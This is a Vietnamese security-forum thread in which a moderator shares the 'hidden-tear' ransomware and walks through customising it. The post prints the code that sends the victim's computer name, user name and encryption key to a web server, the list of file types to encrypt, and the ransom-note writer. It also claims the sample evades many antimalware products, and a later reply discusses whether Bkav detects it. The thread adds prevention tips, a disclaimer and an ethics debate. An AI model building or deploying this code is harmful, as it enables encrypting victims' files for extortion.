Tìm hiểu cách ransomware hoạt động và cách phòng chống

Thảo luận trong 'Virus/Malware' bắt đầu bởi whf, 19/08/15, 09:08 PM.

  1. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,122
    Đã được thích: 742
    Điểm thành tích:
    113
    Trong bài viết này mình xin chia sẻ với các bạn một bộ mã nguồn ransomware đơn giản, thông qua đó chúng ta có thể hiểu được khái quát cách mà một ransomware hoạt động, từ đó có thêm kiến thức để nghiên cứu phân tích ransomware và đưa ra các giải pháp phòng ngừa, xử lý.

    Ransomware là gì?

    Ransomware là thuật ngữ chỉ những mã độc sử dụng hệ thống mật mã để mã hóa dữ liệu người dùng lưu trữ trên máy tính… sau đó yêu cầu người dùng trả tiền để lấy lại quyền truy cập vào máy hoặc khôi phục dữ liệu. Năm 2013 được các chuyên gia bảo mật đánh giá là năm “bùng nổ” mã độc đòi tiền chuộc, với khoảng 320.000 mã độc dạng Ransomware được thống kê.

    Để bắt đầu các bạn cần tải mã nguồn ransomware từ địa chỉ này.

    Sau khi tải về, giải nén sẽ được thư mục hidden-tear (chứa mã nguồn ransomware), hidden-tear-decrypter (chứa mã nguồn dùng để buid chương trình giải mã). Để build cần có Visual Studio 2013.

    Tính năng:
    • Mã hóa các tập tin bằng thuật toán AES.
    • Gửi khóa mã lên máy chủ.
    • Có thể mã hóa và giải mã tập tin đã bị mã hóa.
    • Tạo tập tin .txt tại Desktop để thông báo/đòi tiền chuộc.
    • Ransomware có kích cỡ nhỏ, nhẹ.
    • Hiện tại có thể vượt qua nhiều trình antimalware.

    Một số thiết lập/tùy chỉnh:

    • Bạn cần có một web server hỗ trợ PHP hoặc Python. Cần tùy chỉnh dòng code sau cho phù hợp trong file hidden-tearForm1.cs
    Mã:
    [I]string targetURL = "https://www.example.com/hidden-tear/write.php?info=";[/I]
    • Script trên web server phải có thể ghi các tham số GET vào file. Hàm SendPassword() của ransomware:
    Mã:
     public void SendPassword(string password){         
                string info = computerName + "-" + userName + " " + password;
                var fullUrl = targetURL + info;
                var conent = new System.Net.WebClient().DownloadString(fullUrl);
            }
    • Tùy chỉnh mã hóa các tập tin có đuôi ở đoạn code:
    Mã:
    var validExtensions = new[]            {
                    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
                };
    • Tùy chỉnh tên, nội dung tập tin thông báo trên Desktop:
    Mã:
    string path = "Desktop    estREAD_IT.txt";         
    string fullpath = userDir + userName + path;
                string[] lines = { "Files has been encrypted with hidden tear", "Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." };
                System.IO.File.WriteAllLines(fullpath, lines);
    Clip demo:

    Biện pháp phòng chống, giảm thiệt hại từ ransomware:

    • Luôn sử dụng trình antimalware tin cậy.
    • Thường xuyên backup dữ liệu quan trọng.
    • Không mở những tập tin, những đường link gửi qua email/facebook không rõ nguồn gốc và không đảm bảo an toàn.
    • Tắt chế độ tự động mở, chạy các tệp tin đính kèm theo thư email.
    • Thường xuyên cập nhật tin tức cảnh báo về các biến thể và những "chiêu trò" mới của ransomware để phòng tránh.
    Chú ý:

    • Chỉ buid, thử nghiệm ransomware trên máy ảo.
    • Tác giả không chịu bất cứ trách nhiệm nếu người dùng sử dụng sai mục đích.
    • Bài viết chỉ mang tính chất học hỏi, tìm hiểu, nghiên cứu về ransomware, không phục vụ cho mục đích phá hoại. Mọi hành vi sử dụng sai mục đích sẽ phải tự chịu trách nhiệm trước pháp luật.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. D.Villa

    D.Villa W-------

    Tham gia: 09/05/15, 12:05 PM
    Bài viết: 13
    Đã được thích: 3
    Điểm thành tích:
    18
    Re: [Hướng dẫn] Cách tạo một ransomware

    Thấy trên máy bạn có dùng Avira, không biết có qua mặt được Bkav Pro 2015 không? :rolleyes:
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. whf

    whf Super Moderator Thành viên BQT

    Tham gia: 06/07/13, 03:07 AM
    Bài viết: 1,122
    Đã được thích: 742
    Điểm thành tích:
    113
    Re: [Hướng dẫn] Cách tạo một ransomware

    Theo kết quả mới nhất trên virustotal thì Bkav chưa phát hiện, tuy nhiên Bkav sẽ sớm phát hiện mẫu này thôi do mình gửi mẫu rồi

    https://www.virustotal.com/en/file/...837bfa8aac2e8d7195014d8b/analysis/1440039887/
     
    Last edited by a moderator: 30/05/20, 12:05 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. mianlien

    mianlien New Member

    Tham gia: 23/01/19, 12:01 AM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    Ransomware lan tràn mà không ai giúp decrypter , còn bày đặt tạo ransom!
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 660
    Đã được thích: 743
    Điểm thành tích:
    93
    Học hack để phòng hack , hiểu cách tạo để phòng chống nha bạn
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. mianlien

    mianlien New Member

    Tham gia: 23/01/19, 12:01 AM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    Kẻ yếu học cách giết người - Người mạnh học cách cứu người !
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 660
    Đã được thích: 743
    Điểm thành tích:
    93
    Nếu bạn không biết cách nó được tạo ntn ( cơ bản ) và cách hoạt động của nó thì sao bạn đối phó và tìm ra kẻ xấu
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    whf thích bài này.
  8. hainhc

    hainhc W-------

    Tham gia: 25/01/16, 03:01 PM
    Bài viết: 28
    Đã được thích: 15
    Điểm thành tích:
    3
    Người ta chỉ cho bạn kiến thức để bạn tự cứu mình, còn muốn người khác làm thì bỏ tiền ra mà thuê nhé.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 660
    Đã được thích: 743
    Điểm thành tích:
    93
    Nếu bạn nói rằng phải bỏ tiền ra mà thuê thì cũng chả khác gì so sánh lòng tốt với đồng tiền
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan